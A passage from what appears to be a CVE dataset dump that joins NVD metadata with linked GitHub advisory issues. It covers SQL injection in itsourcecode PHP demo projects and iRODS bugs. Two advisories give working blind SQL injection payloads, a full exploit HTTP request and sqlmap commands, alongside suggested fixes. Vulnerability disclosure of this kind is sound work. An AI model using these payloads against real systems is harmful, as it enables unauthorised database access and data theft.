"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/chenwulin-bit/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268723"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268723"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357462"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/chenwulin-bit/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268723"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268723"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357462"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_house_rental_system_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "83FB0E1D-9D4D-40F5-8326-94970698C31F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/chenwulin-bit/cve/issues/1 | [
"Exploit",
"Technical Description",
"Third Party Advisory"
] | github.com | [
"chenwulin-bit",
"cve"
] | # Itsourcecode Online House Rental System Project In PHP With Source Code v1.0 manage_user.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online House Rental System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-house-rental-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ chenwulin
## Vulnerable File
+ manage_user.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Online-House-Rental-Project-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'manage_user.php' file of the 'Online House Rental System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "month_of" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="910" alt="1" src="https://github.com/chenwulin-bit/cve/assets/172822200/2bbaebf6-50aa-4e8b-b6eb-b0c9ac58f2e0">
<img width="911" alt="4" src="https://github.com/chenwulin-bit/cve/assets/172822200/6919a26f-9031-46fc-8150-77bfc5ed5b28">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "month_of" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Online House Rental System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'month_of' parameter
## Payload:
page=payment_report&month_of=2024-06' AND (SELECT 2382 FROM (SELECT(SLEEP(5)))pylo) AND 'mZtF'='mZtF
<img width="910" alt="1" src="https://github.com/chenwulin-bit/cve/assets/172822200/644e8324-ddf7-4d18-a865-2d789da7f3f0">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.1.136:1216/index.php?page=payment_report&month_of=2024-06" --batch --dbs
```
<img width="468" alt="3" src="https://github.com/chenwulin-bit/cve/assets/172822200/60f8b0e4-acfc-449b-80c6-02986568ed7c">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online House Rental System Project In PHP With Source Code v1.0 manage_user.php SQL injection | https://api.github.com/repos/chenwulin-bit/cve/issues/1/comments | 0 | 2024-06-14T14:38:14Z | 2024-06-14T14:38:14Z | https://github.com/chenwulin-bit/cve/issues/1 | 2,353,523,129 | 1 | 6,075 |
CVE-2024-6016 | 2024-06-15T19:15:48.443 | A vulnerability, which was classified as critical, has been found in itsourcecode Online Laundry Management System 1.0. Affected by this issue is some unknown functionality of the file admin_class.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268724. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/chenwulin-bit/cve/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268724"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268724"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357463"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description",
"Third Party Advisory"
],
"url": "https://github.com/chenwulin-bit/cve/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.268724"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268724"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://vuldb.com/?submit.357463"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:laundry_management_system_project_in_php_with_source_code:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9098A3E9-9903-45B9-8F93-8F55DD9FD767",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/chenwulin-bit/cve/issues/2 | [
"Exploit",
"Technical Description",
"Third Party Advisory"
] | github.com | [
"chenwulin-bit",
"cve"
] | # Itsourcecode Laundry Management System Project In PHP v1.0 admin_class.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Laundry Management System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/laundry-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ chenwulin
## Vulnerable File
+ admin_class.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Laundry-Management-System-Project-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'admin_class.php' file of the 'Laundry Management System Project In PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="814" alt="1" src="https://github.com/chenwulin-bit/cve/assets/172822200/59449a54-d9b2-4302-9203-fc60bc9fd59a">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Laundry Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
```
POST /ajax.php?action=save_user HTTP/1.1
Host: 192.168.1.136:1215
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 62
Origin: http://192.168.1.136:1215
Connection: close
Referer: http://192.168.1.136:1215/index.php?page=users
Cookie: PHPSESSID=rfkglhgunub3dub22riq796k7j; pma_lang=zh_CN; phpMyAdmin=ujrjcboafog9dlu1gdvde2h12k; pmaUser-1=%7B%22iv%22%3A%22vK4EAyr9VLsT3SeOUwZUIw%3D%3D%22%2C%22mac%22%3A%2268eccff8dac32025157f35833e5b8871300b0bc6%22%2C%22payload%22%3A%22Q7C3Smm%2BfZKGX%2BXNQgbuWA%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22s2zrXn936ONY3MbdOHfxvA%3D%3D%22%2C%22mac%22%3A%226b376c3eee69bfaecc9058af2d8e98e0758d1d9a%22%2C%22payload%22%3A%22Pga6jrC2TLPgsCis%5C%2FvquwEPKjbO40AEpBValSJIcQAM%3D%22%7D
Priority: u=1
name=admin123&username=admin111&password=admin123&type=1&id=''
```
## Vulnerability type:
+ time-based blind
+ boolean-based blind
## Vulnerability location:
+ 'id' parameter
## Payload:
Parameter: id (POST)
```
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (8108=8108) THEN '' ELSE (SELECT 4193 UNION SELECT 7658) END))&name=admin123&username=admin111&password=admin123&type=1
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: id=(SELECT 9119 FROM (SELECT(SLEEP(5)))uzyR)&name=admin123&username=admin111&password=admin123&type=1
```
<img width="645" alt="2" src="https://github.com/chenwulin-bit/cve/assets/172822200/679b6696-2ac9-4e6a-b401-ff5b3af4918b">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r 123 --batch --dbs
```
<img width="527" alt="3" src="https://github.com/chenwulin-bit/cve/assets/172822200/8b9fec58-fb15-4cfd-bd34-55a4a20d5a65">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Laundry Management System Project In PHP v1.0 admin_class.php SQL injection | https://api.github.com/repos/chenwulin-bit/cve/issues/2/comments | 0 | 2024-06-14T14:46:54Z | 2024-06-14T14:46:54Z | https://github.com/chenwulin-bit/cve/issues/2 | 2,353,539,007 | 2 | 6,076 |
CVE-2024-38461 | 2024-06-16T16:15:09.537 | irodsServerMonPerf in iRODS before 4.3.2 attempts to proceed with use of a path even if it is not a directory. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/irods/irods/issues/7652"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/irods/irods/releases/tag/4.3.2"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://irods.org/2024/05/irods-4-3-2-is-released"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/irods/irods/issues/7652"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/irods/irods/releases/tag/4.3.2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://irods.org/2024/05/irods-4-3-2-is-released"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:irods:irods:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B450EAB-6C4F-4515-8110-7716F5B2141B",
"versionEndExcluding": "4.3.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"754"
] | 754 | https://github.com/irods/irods/issues/7652 | [
"Issue Tracking"
] | github.com | [
"irods",
"irods"
] | - [x] main
- [x] 4-3-stable | irodsServerMonPerf doesn't check for bad paths | https://api.github.com/repos/irods/irods/issues/7652/comments | 0 | 2024-04-09T16:54:32Z | 2024-04-09T17:39:54Z | https://github.com/irods/irods/issues/7652 | 2,233,889,252 | 7,652 | 6,077 |
CVE-2024-38462 | 2024-06-16T16:15:09.627 | iRODS before 4.3.2 provides an msiSendMail function with a problematic dependency on the mail binary, such as in the mailMS.cpp#L94-L106 reference. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/irods/irods/blob/97eb33f130349db5e01a4b85e89dd1da81460345/server/re/src/mailMS.cpp#L94-L106"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/irods/irods/issues/7562"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/irods/irods/issues/7651"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://irods.org/2024/05/irods-4-3-2-is-released/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/irods/irods/blob/97eb33f130349db5e01a4b85e89dd1da81460345/server/re/src/mailMS.cpp#L94-L106"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/irods/irods/issues/7562"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/irods/irods/issues/7651"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://irods.org/2024/05/irods-4-3-2-is-released/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:irods:irods:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B450EAB-6C4F-4515-8110-7716F5B2141B",
"versionEndExcluding": "4.3.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"426"
] | 426 | https://github.com/irods/irods/issues/7562 | [
"Issue Tracking"
] | github.com | [
"irods",
"irods"
] | - [x] main
- [x] 4-3-stable
---
## Deprecation
`msiSendMail` provides very basic functionality for sending email. iRODS exposes mechanisms for building much better email-related tools (e.g. `msiExecCmd` and Python).
This microservice also adds an unnecessary dependency on the `mail` binary.
With that said, `msiSendMail` should be deprecated. | Deprecate `msiSendMail` | https://api.github.com/repos/irods/irods/issues/7562/comments | 0 | 2024-03-14T15:54:03Z | 2024-03-18T16:22:03Z | https://github.com/irods/irods/issues/7562 | 2,186,719,768 | 7,562 | 6,078 |
CVE-2024-38462 | 2024-06-16T16:15:09.627 | iRODS before 4.3.2 provides an msiSendMail function with a problematic dependency on the mail binary, such as in the mailMS.cpp#L94-L106 reference. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/irods/irods/blob/97eb33f130349db5e01a4b85e89dd1da81460345/server/re/src/mailMS.cpp#L94-L106"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/irods/irods/issues/7562"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/irods/irods/issues/7651"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://irods.org/2024/05/irods-4-3-2-is-released/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/irods/irods/blob/97eb33f130349db5e01a4b85e89dd1da81460345/server/re/src/mailMS.cpp#L94-L106"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/irods/irods/issues/7562"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/irods/irods/issues/7651"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://irods.org/2024/05/irods-4-3-2-is-released/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:irods:irods:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B450EAB-6C4F-4515-8110-7716F5B2141B",
"versionEndExcluding": "4.3.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"426"
] | 426 | https://github.com/irods/irods/issues/7651 | [
"Issue Tracking",
"Patch"
] | github.com | [
"irods",
"irods"
] | - [x] 4-3-stable
- [x] irods/irods_docs
## Deprecation
- Add private variable for controlling whether `msiSendMail` returns early
- Add new MSI for changing the value of the variable
- Requires rodsadmin privileges
- Potential names for the MSI
- `msi_use_deprecated_msiSendMail`
- `msi_allow_deprecated_msiSendMail`
- `msi_enable_deprecated_msiSendMail`
- `msiSendMail` checks private variable before sending any mail
- Consider whether use of `msiSendMail` should reset the private variable | Make `msiSendMail` opt-in | https://api.github.com/repos/irods/irods/issues/7651/comments | 1 | 2024-04-09T16:45:59Z | 2024-04-11T19:08:52Z | https://github.com/irods/irods/issues/7651 | 2,233,875,219 | 7,651 | 6,079 |
CVE-2024-6041 | 2024-06-16T23:15:49.417 | A vulnerability was found in itsourcecode Gym Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268765 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
